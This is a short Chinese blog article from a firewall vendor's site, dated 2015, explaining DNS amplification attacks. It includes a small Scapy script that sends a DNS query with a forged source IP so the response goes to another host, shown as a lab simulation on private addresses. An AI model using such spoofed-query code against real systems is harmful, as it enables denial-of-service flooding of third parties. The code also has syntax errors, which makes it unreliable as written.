关于冰盾 | 使用条款 | 网站地图
 
用scapy模拟DNS放大攻击
用scapy模拟DNS放大攻击
作者:冰盾防火墙 网站:www.bingdun.com 日期:2015-01-07
 

首先,DNS放大攻击,简单解释有两点:

1.伪造源IP为其他人的ip地址

2.被请求的记录,要求比较大,比如TXT格式,4000KB

 

在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。

可以用python的scapy模拟:

from scapy import *

a = IP(dst=10.32.8.11,src=10.32.132.85)     #10.32.132.85即为伪造的源ip

b = UDP(dport=53)

c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)

c.qd=DNSQR(qname=www.qq.com,qtype=1,qclass=1)

p = a/b/c

send(p)

模拟结束。

在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。

 

---------------------------------------------------------------------------
低调的python小子

 

 
最新内容:
DNS放大攻击原理、实现与防御[2015-01-07]
Mozilla Firefox/SeaMonkey eval() 函数安全限制绕过漏洞[2015-01-07]
Ubuntu安装denyhosts防止暴力破解远程SSH[2015-01-07]
MYSQL用户管理员ROOT弱密码攻击战[2015-01-07]
特洛伊木马的原理和远程控制的主要方式[2015-01-07]
分布式拒绝服务攻击(DDoS)的原理和结构[2015-01-07]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195